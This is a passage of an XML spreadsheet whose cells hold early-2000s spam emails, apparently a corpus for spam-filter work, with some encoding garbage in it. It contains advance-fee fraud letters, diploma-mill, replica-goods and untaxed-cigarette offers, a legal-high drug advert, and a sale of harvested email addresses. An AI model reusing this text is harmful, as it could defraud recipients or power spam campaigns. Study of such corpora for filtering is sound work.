rg) for further 
details.Â 
Â 
We
awaitÂ your 
confirmation!!
</t>
  </si>
  <si>
    <t>ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½{ï¿½ï¿½ï¿½[ï¿½Vï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½[ï¿½^ï¿½rï¿½fï¿½Iï¿½iï¿½cï¿½uï¿½cï¿½jï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½I
http://www.transrave.com/PC/rori
ï¿½ï¿½ï¿½iï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½`ï¿½ï¿½ï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½n9ï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½132ï¿½ï¿½ï¿½iï¿½Bï¿½Dï¿½]ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½I
(^-^)/~ï¿½ï¿½ï¿½ï¿½ï¿½Fï¿½ï¿½ï¿½ï¿½ï¿½gï¿½[
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-ports" in the body of the message</t>
  </si>
  <si>
    <t xml:space="preserve">
Don't Wait! Refinance 
          Now!!
Take Advantage of the Lowest Rates 
          In Decades!
Â 
RatesÂ may only go higher!
LOWER YOUR PAYMENT AND 
                  LOWER YOUR RATE!!!Â Â 
USE OUR 100%Â FREE SERVICEÂ Â Â ***Â NoÂ FEES
****No OBLIGATIONSÂ and 
            NoÂ COMMITMENTS
Find Out How Much YOU Can $AVE!!!Â ItsÂ Free, Fast and SimpleÂ 
Rates are at the lowest point in decades!
NationalÂ Lenders Ready to Serve You 
              ! Click Here 
                  Now
To be removed, REPLY to this email with REMOVE 
                  in the SUBJECT.
</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN:I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re-election.All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confidential.Please do not use the reply button, reply only to Edmulete7@netscape.net Please take note.God bless you indeed as you help yourself and us.Mr. EDWARD MULETE
 -- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">HTML&gt;
Â Â Â Â Â Â Â Â Â Â Â Â      
Ä°NTERNETTE KENDÄ°NÄ°ZÄ° DAHA Ä°YÄ° HÄ°SSEDECEKSÄ°NÄ°Z.
	  Ä°NGÄ°LÄ°ZCE WEB SAYFALARININ TÃœRKÃ‡E'YE Ã‡EVÄ°RÄ° YAZILIMI
	    $ 39+KDV 
 Ä°NGÄ°LÄ°ZCE'DEN TÃœRKÃ‡E'YE BÄ°LGÄ°SAYAR DESTEKLÄ°
	    METÄ°N Ã‡EVÄ°RÄ° YAZILIMI  
	 (MS-WORD ALTINDA KULLANIM, TÃœM WINDOWS VERSÄ°YONLARI Ä°LE UYUMLU)
	   $ 69+KDV Ä°KÄ° YAZILIM Â  BÄ°RLÄ°KTE 
$ 
  89+KDVAyrÄ±ntÄ±lÄ± Bilgi 
      Ä°Ã§inÂ    tÄ±klayÄ±n 
      Â Â Â Â Â Â Â Â Â Â Â       
      Â  
BÄ°LSAG Ltd.
AHMET MÄ°THAT 
      EFENDÄ° SOK. 22/1 Ã‡ANKAYA 06700 / ANKARA /
Tlf: 0312. 439 2850/ Fax: 0312. 439 9347bilsag@msn.comÂ 
Â E-posta adres listemizden Ã§Ä±kmak iÃ§inÃ‡IKAR tuÅŸuna basÄ±nÄ±zBu elektronik posta: webmake-talk@example.sourceforge.net e gÃ¶nderilmiÅŸtir-------------------------------------------------------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
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Partner to be,First, I must apologise to you for using this medium to communicate to you
about this project.I am a highly placed official of  Government of Nigeria and also a
founding member of the ruling party in Power now,the Peoples Democratic
Party(PDP).My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supervision.The fund is presently waiting in the Government Account named CBN/FGN
INDEPENDENT REVENUE account number 400-939134 with J.P.MORGAN CHASE
BANK,New York.You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now.I have been delegated as a matter of trust by my colleagues,
to look for an overseas partner in whose account we would
transfer the fundHence the reason for this mail.We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through.For your support and partnership,please reply me to negotiate your fees or
the percentage you wish to be paid when the funds arrive your bank account.You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over.The transaction, although discrete, is legitimate and there
is no risk or legal disadvantages either to ourselves or yourself now or
in the future as we have put in place perfect mchineries that will ensure
a hitch free transfer into your account upon acceptance.The transfer will be effected to your account within ten-fourteen
(10-14) working days as soon as we reach an agreement and you furnish
me with a  suitable bank account and company name and address with all
your contact numbers including fax number.I am looking forward to doing business with you and do solicit
your confidentiality in this transaction,  Please mail your
response to me.Yours faithfully,
Anderson K. Eseimoku
 -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">$19.95 and up!  Buy cartons of cigarettes wholesale, starting at $19.95.  
FREE SHIPPING!Why pay state taxes?  100% legal. Mailed from Swiss bonded warehouse. For 
personal use only, must be 18 years of age and older, verified by credit 
card. http://4tools4life.com/cigs/index.php?104AOL Users Click HereTo be removed from future mailings, REPLY to this email with REMOVE in the SUBJECT line.
</t>
  </si>
  <si>
    <t xml:space="preserve">New Page 1
You can live a life of luxury 
only if you work for yourself.
Â 
AbsolutelyFREE information on a home based business.
Â 
Just
CLICK
HERE
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear ilug@linux.ie Life Partners are life insurance appraisers that appraise all types of life insurance policies, allowing people to access their life insurance cash now rather than later. We help individuals unlock cash from unutilized assets. 
Individuals usually age 65 or older who find that their health, financial and/or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NOW.Why do people sell their policies? 
The reasons individuals make the decision to sell their life insurance policies are as varied as the people themselves. Some reasons may be to:Pay off debts 
Fund long term care insurance cost 
Eliminate costly premiums 
Take advantage of other financial opportunities 
Make charitable contributions 
Help family members 
Life Partners ï¿½Living Solutionsï¿½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!!1-866-686-LIFE 
1-866-686-5433  or  e-mail us at llhjr55@yahoo.com with your Name and telephone number and we will have one of our team members contact you ASAP. If you would like to be removed please send 'remove' to llhjr55@yahoo.com
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">5, Meridian East
Leicester LE3 2WZ 
Leicester City, 
United Kingdom
Tel/Fax: 44-870-136-7079Date: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
-------------------------------------------------------
In remembrance
www.osdn.com/911/
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t>5, Meridian East
Leicester LE3 2WZ 
Leicester City, 
United Kingdom
Tel/Fax: 44-870-136-7079Date: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</si>
  <si>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Â· $50 Deposit Bonus! - 100% bonus!
  Â· Daily High Hand - $250 Daily.
  Â· Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added
daily.
  Â· Tournaments - Multiplayer shootouts.
wish not to received any further e-mail from us please click
http://www.centralremovalservice.com/cgi-bin/poker-remove.cgi
(C2-ss2)8654wjxY6-658XcLk9936BmrC8-408IWAe1238EocG7-405CvgV8282pIEa7-369wxhf6085uYwv5-l73
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
Finally! 
You've waited a long time for this!
Obtain Your   University Diploma! (Phd, MBA, ect) 
Here is how to receive your University Diploma.1 - 6 4 6 - 2 1 8 - 1 2 0 0    Call Us ANYTIME!
Whether it's a Phd or an MBA, 
the end result is a Beautiful Diploma on your wall.There's nothing like the feeling of getting 
the respect of your peers and co-workers.Some things in life ARE easy. Just pick up the phone and call us today!Everyone is eligible! 
1 - 6 4 6 - 2 1 8 - 1 2 0 0 Call 24 hours a day, 7 days a week, 
including Sundays and holidays. For Removal mailto:no_degree_xyz@excite.com</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</si>
  <si>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
Â 
0783Iixc7-224SSVD1282BjAl2-765knZz61l34
</t>
  </si>
  <si>
    <t xml:space="preserve">
Check the REPORTS you would like to receive
A{color:navy; text-decoration:none; font-weight:bold; font-family:arial,helvetica,sans-serif}
A:hover{color:red; text-decoration:none; font-weight:bold; font-family:arial,helvetica,sans-serif}
A:active{color:ffcc00; text-decoration:none; font-weight:bold; font-family:arial,helvetica,sans-serif}
A:visited{color:ffcc00; text-decoration:none; font-weight:bold; font-family:arial,helvetica,sans-serif}
BODY{color:black; font-family:verdana}
TD{font-family:arial,helvetica,sans-serif}
Check the Available REPORTS you would like to receive:Â Keep on TOP of the latest NEWS, Get
                Great Special DEALS now...
				Â It is complimentary, it costs nothing, YOU can QUIT anytime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IntrestsÂ  - Dating				General Interest
				AdultWebmasters - General
				AdultWebmasters - Unrestricted sites
				AdultWebmasters - Content buyers
                Cassino's &amp; Online Gamblinng
				Dating Services &amp;Â  Personal Ads
				Send Me 10 Uncensored Pictures Daily !
			This mail is NEVER sent unsolicited, Got it by error ?[ CLICK HERE ] to be removed from our subscribers List !
ndtxcpfjspwwtrkaxnxg
</t>
  </si>
  <si>
    <t xml:space="preserve">Norton AD
Take
      Control of Your Computer With This Top-of-the-Line Software!Norton
            SystemWorks 2002  Software Suite
            -Professional Edition-
Includes
            Six - Yes 6! 
            - Feature-Packed UtilitiesALL for 1
            Special LOW
            Price of Only
            $29.99!
This
            Software Will:Â -
            Protect your computer from unwanted and  hazardous  virusesÂ -
            Help secure your private &amp; valuable informationÂ - Allow
            you to transfer files and send e-mails  safelyÂ -
            Backup your ALL your data quick and easilyÂ - Improve your
            PC's performance w/superior
            integral diagnostics!Â - You'll NEVER have to take your
            PC to the repair shop AGAIN!Â 
6
            Feature-Packed Utilities
            1
            Great Price 
            A $300+  
            Combined Retail Value
YOURS  for
            Only $29.99!&lt;
            Price Includes FREE
Shipping! &gt;And
            For a Limited time Buy Any 2 of Our Products &amp; Get 1 Free!
 Don't fall
    prey to destructive viruses or hackers!ProtectÂ  your computer and
    your valuable information and
-&gt;
            CLICK HERE to Order Yours NOW! &lt;-
or Call
      Toll-Free 1-800-861-1481!
Your email
      address was obtained from an opt-in list. Opt-in IMCAS (Ineternet
      Mail Coalition Against Spam) Approved List - Â Reference #
      3r3109uZ.Â Â If you wish to be unsubscribed from this list, please Click
      here . Allow 5 Business days for removal. If you have previously unsubscribed and are still receiving
      this message, you may email our Spam
      Abuse Control Center. We do not condone spam in any shape or form.
      Thank You kindly for your cooperation.
</t>
  </si>
  <si>
    <t xml:space="preserve">Free Info!
FREE
The
            Insider Stock Market Report
$2400 Value
Get
            the latest competitive intelligence, insider knowledge and
            deal-sourcing contacts to stay ahead &amp; succeed in this
            supercharged market!
Free
                  3 month subscriptionSubscribed
            to by over 200 investment bankers, venture capitalists, fund
            managers, deal-makers and public company CEO &amp; CFOï¿½sworld
                market overviews and updates
"first
                seen" analyst reports
investment
                alerts
portfolio
                strategies for the 21st century
annual
                offshore jurisdiction rankings report
Get
                  the information the professionals profit from $$$
Fill out the form forÂ 
            FREE SUBSCRIPTION No
            credit card needed!Sorry
            to see you go, but to
            unsubscribe from our newsletterÂ complete the following
Email AddressÂ Â Â    
Â 
Â 
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Please rememberYou must be 18 years
      of age or older
.YourÂ FirstÂ Name:*YourÂ LastÂ Name:*StreetÂ Address:*City*Â Â Â PostalÂ /Â ZipÂ Code:*Country:*SelectAlbaniaAlgeriaAmerican SamoaAndorraAngolaAnguillaAntarcticaAntigua &amp; BarbudaArgentinaArmeniaArubaAustraliaAustriaAzerbaijanBahamasBahrainBangladeshBarbadosBelarusBelgiumBelizeBeninBermudaBhutanBoliviaBosniaBotswanaBouvet IslandBrazilBritish Ocean TerritoryBritish Virgin IslesBruneiBulgariaBurkina FasoBurmaBurundiCambodiaCameroonCape VerdeCayman IslandsCentral African Rep.ChadChileChinaChristmas IslandCocos IslandsC!
olombiaComorosCongoCook IslandsCosta RicaCroatiaCyprusCzech RepublicDenmarkDjiboutiDominicaDominican RepublicEast TimorEcuadorEgyptEl SalvadorEquatorial GuineaEritreaEstoniaEthiopiaFalkland IslandsFaroe IslandsFijiFinlandFranceFrench GuianaFrench PolynesiaFrench SouthernGabonGambiaGeorgiaGermanyGhanaGibraltarGreeceGreenlan!
dGrenadaGuadeloupeGuatemalaGuineaGuinea-BissauGuyanaHaitiHeard &amp; McDonald IslesHondurasHong KongHungaryIcelandIndiaIndonesiaIrelandIsraelItalyIvory CoastJamaicaJapanJordanKazakhstanKenyaKiribatiKorea, SouthKuwaitKyrgyzstanLaosLatviaLebanonLesothoLiberiaLiechtensteinLithuaniaLuxembourgMacauMacedoniaMadagascarMalawiMalaysiaMaldivesMaliMaltaMarshall IslandsMartiniqueMauritaniaMauritiusMayotteMexicoMicronesiaMoldovaMonacoMongoliaMontserratMoroccoMozambiqueNamibiaNauruNepalNetherlandsNetherlands AntillesNew CaledoniaNew ZealandNicaraguaNigerNigeriaNiueNorfolk IslandNorthern Mariana IslandsNorwayOmanPakis!
tanPalauPanamaPapua New GuineaParaguayPeruPhilippinesPitcairn IslandPolandPortugalPuerto RicoQatarReunionRomaniaRussiaRwandaS.Georgia &amp; S.Sandwich IslesSaint Kitts &amp;amp; NevisSaint LuciaSaint VincentSamoaSan MarinoSao Tome and PrincipeSaudi ArabiaSenegalSeychellesSierra LeoneSingaporeSlovakiaSloveniaSomaliaSouth AfricaSpainSri LankaS!
t. HelenaSt. Pierre and MiquelonSurinameSvalbardSwazilandSwedenSwitzerlandTaiwanTajikistanTanzaniaThailandTogoTokelauTongaTrinidad and TobagoTunisiaTurkeyTurkmenistanTurks and Caicos IslandsTuvaluU.S. Minor Outlying IslandsUgandaUkraineUnited Arab EmiratesUnited KingdomUruguayUzbekistanVanuatuVatican CityVenezuelaVietnamVirgin IslandsWallis and Futuna IslandsW!
estern SaharaYemenYugoslavia (Former)ZaireZambiaZimbabweTelephone:*MobileÂ /Â Work:*Fax:EmailÂ Address:** Required FieldsÂ 
Â 
v
</t>
  </si>
  <si>
    <t xml:space="preserve">Click Here
hwawrlgiooooqvjoii
</t>
  </si>
  <si>
    <t xml:space="preserve">Would you like to know what the Powerball Winning Lottery Numbers will be in the Morning, If so Just Follow This link mailto:results.cresenttechnologies.comAlthough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11, 2002 Draw Results:
03 06 26 39 48 PB 28 PP 03 Or Visit http://www.powerballinfo.cjb.net
Are you tired of your job?Then Please Visit http://www.cash-in.cjb.net  It's Time to Retire!!
</t>
  </si>
  <si>
    <t>This email is being sent to zzzz@jmason.org. To unsubscribe please
visit http://www.venturereporter.net/myaccount/ . If you ever have a problem
removing or changing your email subscriptions on our newsletters, or getting
in touch with us, please don't hesitate to email support@venturereporter.net
and a human will get in touch with you immediately. Venture Reporter 307
West 36th Street, 10th Floor New York, New York 10018 Phoe: 646.473.2222
The online content business.Dear Friends,The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U.S.  consumers spent $675 millionÂ on paidÂ online content last
year,  a 92 percent increase over 2000 spending levels,  according to Online
Publishers Association,  and that figure is expected to increase exponentially
this year.  Look at these success stories:
New York Times Digital has 
been steadily increasing its paid content services over the last year,  and 
registered a 16 percent increase in its total revenues for the latest quarter.
TheStreet.com brought over 
$3 million in subscriptions last quarter,  an increase of almost 50 percent 
over the year-ago quarter.
ConsumerReports.com will 
reach over a million paying subscribers by the end of this year.
RealNetworks' consumer multi-media 
subscription service has more than 750,000 subscribers,  bringing in $17.8 
million in the last quarter.
The Wall Street Journal Online
added over 6,000 new paying customers last quarter,  bringing its subscriber
base to 646,000.
FT.com has signed up 17,000 
subscribers in three months since it launched its premium site in May.
In recognition of this trend we're hosting 
the third installation of our innovative Content Management Summit on October 10, 
2002.  The event charts the changes in the content industry from free 
to paid subscription services,  and the technologies that are enabling the management and monetizing of content.
Our previous Content Management 
Summit (aka Digital Rights Summit) on October 18 last year in New York City 
and January 29 in Los Angeles were unqualified successes.
The Content Management Summit 
III,  taking place in New York at the Millennium Broadway on October 10, 
2002,  will bring together the 100 executives from the leading content and 
distribution firms for a focused day of networking and discovering practical 
solutions.
The event will feature presentations 
from software and services companies providing services
and solutions for selling,  distributing,  managing,  and protecting content.
We're thrilled that 
Microsoft,  TeleKnowledge,  eMeta,  and Liquify will all be demonstrating 
their latest products and services.
The event will also feature six intimate round tables focusing on various aspects of online content.
 These panels are meant to provide an informal forum to discuss the challenges
facing these specific vertical markets,  the changes in the sectors since
the dot-com downfall,  and best practices in the industry.  The panels will
feature leading practitioners in each sector,  and will also include an interactive
question and answer session with the audience.
Among the round table topics will be:
Weblogs:  how they are affecting big media 
companies,  editorially as well as in content delivery/production mechanisms.
Financial news and information 
companies:  how they are using technologies to deliver content to users, 
and how the economics have changed since the stock market downfall.
Business information services 
such as Hoovers,  Lexis-Nexis and others:  best practices in the industry, 
 niche product launches and revenue streams.
Daily news/newspaper companies 
publishing online:  how speed dictates technology choices,  and the move towards
paid content and its implications,  among other issues.
Consumer and entertainment 
publishers:  how do publishers determine the value of entertainment content, 
 the push towards paid subscriptions,  online advertising and other issues.
Join us on October 10th 
for this very important event.  If you are directly responsible 
for content management at a major content site you may qualify for 
a VIP ticket.  Please e-mail your request with your name,  title and bio to
invite@cmsummit.com.  If you are
with a software or services provider,  or anyone not directly responsible 
for the purchase of content management software or solutions,  you can purchase 
a ticket to this event for $1,200 at invite@cmsummit.com.  
Best Regards,
Jason McCabe Calacanis
  Editor-in-Chief 
&amp;  CEO,  Venture Reporter &amp;  Silicon Alley Reporter This email
 is being   sent to zzzz@jmason.org. 
If you would
 rather   not receive  these infrequent updates simply click     
  here        and you will be removed instantly. 
You can also click   the
 link here or cut and paste it into your browser:
 http://venturereporter.net/myaccount/k.asp?E=jm@jmason.org 
      Â 
 Venture 
     Reporter  307 
West 36th Street, 10th Floor
New York, New 
 York      10018
Phoe: 646.473.2222</t>
  </si>
  <si>
    <t xml:space="preserve">REGISTER .COM, .BIZ, AND .INFO DOMAINS FOR ONLY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(g2-ss2)4483ZsiO6-368esUR2641hwjE2-115mHZg9267xWnFl40
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</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</si>
  <si>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Â· $50 Deposit Bonus! - 100% bonus!
  Â· Daily High Hand - $250 Daily.
  Â· Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added
daily.
  Â· Tournaments - Multiplayer shootouts.
wish not to received any further e-mail from us please click
http://www.centralremovalservice.com/cgi-bin/poker-remove.cgi
(C4-ss2)3492QGau9-441Wmen129l19
4486eyRl1-291l12
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;
GET HIGH...LEGALLY!
IT REALLY WORKS!
      PASSES ALL DRUG TESTS!
      EXTREMELY POTENT!CLICK HERE for more
      info on Salvia Divinorum CLICK HERE for SALVIA
      5X EXTRACT! 
WARNING...VERY POTENT! CLICK HERE for SALVIA
      13X. The most POTENT, LEGAL, SMOKABLE herb on the planet! 13 times the
      power of Salvia Divinorum!
WARNING...EXTREMELY POTENT!Removal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Please accept our apologies if you have been sent this
      email in error. We honor all removal requests within 24 hours.</t>
  </si>
  <si>
    <t xml:space="preserve">
untitled
Copy DVD Movies?Yes!  Copy and burn your own DVD
movies and video with a CD-R Drive.* Order by September 21, 2002, and receive the following Free Gifts!1. "Free DVD Movie of your choice ($20.00 Value)
2. Cell Phone Battery Booster ($19.95 Value)
Own all the DVD's you've always wanted
and start burning today!
.Click Here Now!
</t>
  </si>
  <si>
    <t xml:space="preserve">Fortunes are literally being made in this great new
        marketplace!
Over $9 Billion in merchandise
        was sold on eBay in 2001 by people just like you - right from
        their homes! 
Now you too can learn the secrets of successful selling
        on eBay and make a staggering income from the comfort
        of your own home. If you are motivated, capable of having
        an open mind, and can follow simple directions, then visit
        us here. 
 If you are not interested in future offers go
        here.Â 
Â  
Â 
Â  
</t>
  </si>
  <si>
    <t xml:space="preserve">*** FREE BONUS OFFER - SEE BELOW ***We can supply TOP QUALITY, VIRTUALLY IDENTICAL REPLICAS of just about anything - from watches to wallets, from lighters to lingerie, clothing, accessories, even electrical goods. All your favorite designer labels reproduced at a fraction of the price.All major Credit Cards accepted. Worldwide certified shipping. Quality guaranteed.We are currently building our catalog so let us know that you want to receive notification when our on-line catalog is published later this month to qualify for a GREAT FREE BONUS OFFER.*** FREE BONUS: Register NOW for our catalog and receive one pair of designer REPLICA sunglasses (our regular price $15) &amp; check out the quality of our goods FREE OF CHARGE ***For more information email: replicas@fastnetspain.netRegister NOW to be sure you don't miss out !!!
To remove from future mailings email: noreplicas@fastnetspain.netRegister NOW to be sure you don't miss out !!!
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Have tax problems? Do you owe the IRS money? If your debt is
$5,000 US or more, we can help! Our licensed agents can help
you with both past and present tax debt. We have direct contacts
with the IRS, so once your application is processed we can help
you immediately without further delay.Also, as our client we can offer you other services and help with
other problems. Our nationally recognized tax attorneys,
paralegals, legal assistants and licensed enrolled agents can
help you with:- Tax Preparation
- Audits
- Seizures
- Bank Levies
- Asset Protection
- Audit Reconsideration
- Trust Fund Penalty Defense
- Penalty Appeals
- Penalty Abatement
- Wage Garnishments
.. and more!To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days.Note: For debt size please also include any penalties or interestFull Name Â Â 
State Â Â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Phone Number Â Â 
Time to Contact Â Â 
Tax Debt Size Â Â 
E-Mail Â Â 
Â Thank you for your time!Note: If you wish to receive no further advertisements regarding
this matter or any other, please reply to this e-mail with the
word REMOVE in the subject.
q10bvq9lvq1
</t>
  </si>
  <si>
    <t xml:space="preserve">
GET FREE ACCESS TO XXX PORN!INSTANT ACCESS... 100% FREE HARDCORENote: If you would would like to be removed from our list, please reply to this email with the word REMOVE as the subject78l95
</t>
  </si>
  <si>
    <t xml:space="preserve">*** FREE BONUS OFFER - SEE BELOW ***We can supply TOP QUALITY, VIRTUALLY IDENTICAL REPLICAS of just about anything - from watches to wallets, from lighters to lingerie, clothing, accessories, even electrical goods. All your favorite designer labels reproduced at a fraction of the price.All major Credit Cards accepted. Worldwide certified shipping. Quality guaranteed.We are currently building our catalog so let us know that you want to receive notification when our on-line catalog is published later this month to qualify for a GREAT FREE BONUS OFFER.*** FREE BONUS: Register NOW for our catalog and receive one pair of designer REPLICA sunglasses (our regular price $15) &amp; check out the quality of our goods FREE OF CHARGE ***For more information email: replicas@fastnetspain.netRegister NOW to be sure you don't miss out !!!
To remove from future mailings email: noreplicas@fastnetspain.netRegister NOW to be sure you don't miss out !!!
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Lowest Rate Services
Conferencing Made Easy
Only 18 Cents Per Minute!
(Including Long Distance!)No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Field*Name*
Web 
            Address
Company 
            Name*            State*
Business 
            Phone*
Home 
            Phone
Email 
            Address*
Type of 
            BusinessTo be removed from this list, send an e-mail to remove@b2b-mail.netType the word "remove" in the subject line.
      .
</t>
  </si>
  <si>
    <t xml:space="preserve">Take Control of Your Computer With This TopTake Control of Your Computer 
    With This Top-of-the-Line Software!
Norton SystemWorks 2002
        Software Suite
        -Professional Edition-Includes Six - 
Yes 6! 
        - Feature-Packed Utilities
        ALL for 1 
        Special LOW 
        Price of Only 
        $29.99!This Software 
        Will:
        Â - Protect your computer from unwanted and
        hazardous viruses
        Â - Help secure your private &amp; valuable information
        Â - Allow you to transfer files and send e-mails safely
        Â - Backup your ALL your data quick and easily
        Â - Improve your PC's performance w/superior integral diagnostics!
        Â - You'll NEVER have to take your PC to the repair shop AGAIN!
Â  
6 Feature-Packed Utilities 1 Great 
        Price 
        A $300+ Combined Retail Value 
YOURS for Only
        $29.99! 
&lt; Price 
        Includes FREE
Shipping**! &gt;
Don't fall 
    prey to destructive viruses or hackers!
    ProtectÂ  your computer and your valuable information and
-&gt; CLICK HERE to Order 
        Yours NOW! &lt;-
** Denotes Free Shipping For 
    US/Canadian Customers Only **
Â 
Â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HEREÂ to be removed from the list. Please 
    accept our apologies if you have been sent this email in error. We honor all 
    removal requests.
2102pSqQ8-906DHIX6392XDPF7-0l26
</t>
  </si>
  <si>
    <t xml:space="preserve"> ilug , From;Mr.Michael Kamah and Family,
          Johannesburg,South Africa.My Dear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fortunes.My name is Mr.Michael Kamah, the second son of Mr.Smith  Kamah, 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last undemocratic elections decided to block and !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livelyhood.During my fathers life on earth,he had deposited the sum of Eight Million and Six Hundred Thousand United States Dollars[$8.600.000.00],in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blocked by the present Mugabe's!
 regime.My mother is presently with the valid document covering this deposit.Now this is what I actually want you to do for me;1. I want you to be presented to the Finance and Security company as the person I contacted to assist my family for this purpose, with whose name and adress myself and my mother will forward to them their office in the Republic of Togo as the person that will clear this money when they lift it out to their europe office.
2. To finally assist me in accommodating and managing this money in any lucrative business in your country for at least three years. Please,I hope you will grant and view this very request with favour and much understanding of our situation now,and will be a very honest and reliable person to deal with.And also bearing in mind the confidential nature of this my request,I emphasize please that you keep every bit of it to yourself so as to protect my familys future and yourself rendering this help.Thanking you in anticipation of your urgent response as soon as you read this very request.Best Regards, Mr.Michael Kamah and family. 
 -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">::FREE MORTGAGE QUOTE::To be removed from this list, click here.
</t>
  </si>
  <si>
    <t xml:space="preserve">NEW - NEW - NEW   IN THE MARKET
JUST RELEASED:
300 Million email addresses--Database Fully Exportable, On 3 CDs!!300 Million email addresses--Database Fully Exportable, On 3 CDs!! =Only $99.95
** Contains US &amp; International EMAILS ** 
With 1.5 Million USA Business Fully Exportable Fax Numbers,   ALL TWO DIRECTORIES ABOVE (300 Million and faxes #)	 ** ONLY $99.95 **BOTH EMAIL DIRECTORIES ARE CATEGORIZED
Email Address CDROM (300 Million Addresses)
MORE THAN 134 CATEGORIES SUCH AS:USA--50 STATES AND AREA CODE:
Contains e-mail addresses of people living in all 50 states. Each state is broken down by area codes. Canada and Area Code:
Contains e-mail addresses of people living in Canada. Each province is
broken down by area codesAdult:
Contains e-mail addresses of people interested in adult contentAuto:
Contains e-mail addresses of people interested in automotive contentCanada:
Contains e-mail addresses of people living in Canada. Each province is broken
down by area codes.Classifieds:
Contains e-mail addresses of people advertising in classifieds and people that
are interested in classifiedsCulture:
Contains e-mail addresses of people interested in antiques, art, entertainment,
fashion, movies, etc.Dining:
Contains e-mail addresses of people interested in drinking beer, cooking, dining
out, etc.
Gambling:
Contains e-mail addresses of people interested in gamblingGardening:
Contains e-mail addresses of people interested in gardeningGeographic:
Contains e-mail addresses of people residing in different cities and counties,
broken down by city nameGolf:
Contains e-mail addresses of people interested in golfHealth:
Contains e-mail addresses of people interested in fitness, weight loss, etc.Home Business:
Contains e-mail addresses of people interested in running a home based business,
or are already operating a home based businessHot List:
Contains e-mail addresses of people interested in online shoppingInternational:
Contains e-mail addresses of people living in different countries, broken down
by name of the countryInternet:
Contains e-mail addresses of people who registered a domain name in the past 2 monthsInvestments:
Contains e-mail addresses of people interested in investing in the marketMisc:
Contains e-mail addresses of people interested in auctions, boatingBooks:
Coupons, credit, fishing, mortgage, politics, real estate, religion, trade
shows, etc.Music:
Contains e-mail addresses of people interested in musicInternet Market:
Contains e-mail addresses of people interested in Internet Market placesOpportunity Seekers:
Contains e-mail addresses of people interested in different opportunitiesOpt-In:
Contains e-mail addresses of people interested in Opt-InOutdoors:
Contains e-mail addresses of people interested in outdoor activityPet Lovers:
Contains e-mail addresses of people interested in petsPsychic:
Contains e-mail addresses of people interested in psychicsPublishing:
Contains e-mail addresses of people interested in publishingRecreation:
Contains e-mail addresses of people interested in different recreational
activities.Sci-Fi:
Contains e-mail addresses of people interested in Sci-FiShow Business:
Contains e-mail addresses of people interested in show businessSports:
Contains e-mail addresses of people interested in sportsHealth:
Contains e-mail addresses of people interested in healthWeb design:
Contains e-mail addresses of people interested in web designsTravel:
Contains e-mail addresses of people interested in travelingSuper List:
Contains e-mail addresses of people who have bought more than $2,000.00 over the
Internet in the last 4 monthsThe Tropics:
Contains e-mail addresses of people who live in the Antigua, Bahamas, Barbados,
Bermuda, British Virgin Islands, Caribbean Islands, Cayman Islands, Grenada,
Guam, Jamaica, Puerto Rico, St. Kitts &amp; Nevis, St. Lucia, Trinidad &amp; Tobago,
Turks &amp; Caicos Islands, US Virgin Islands, etc. broken down by area codesAND MANY MORE!
*Everything on this disk is in TEXT file format and is fully exportable.*The CD is as easy to use as browsing your C drive in Explorer.
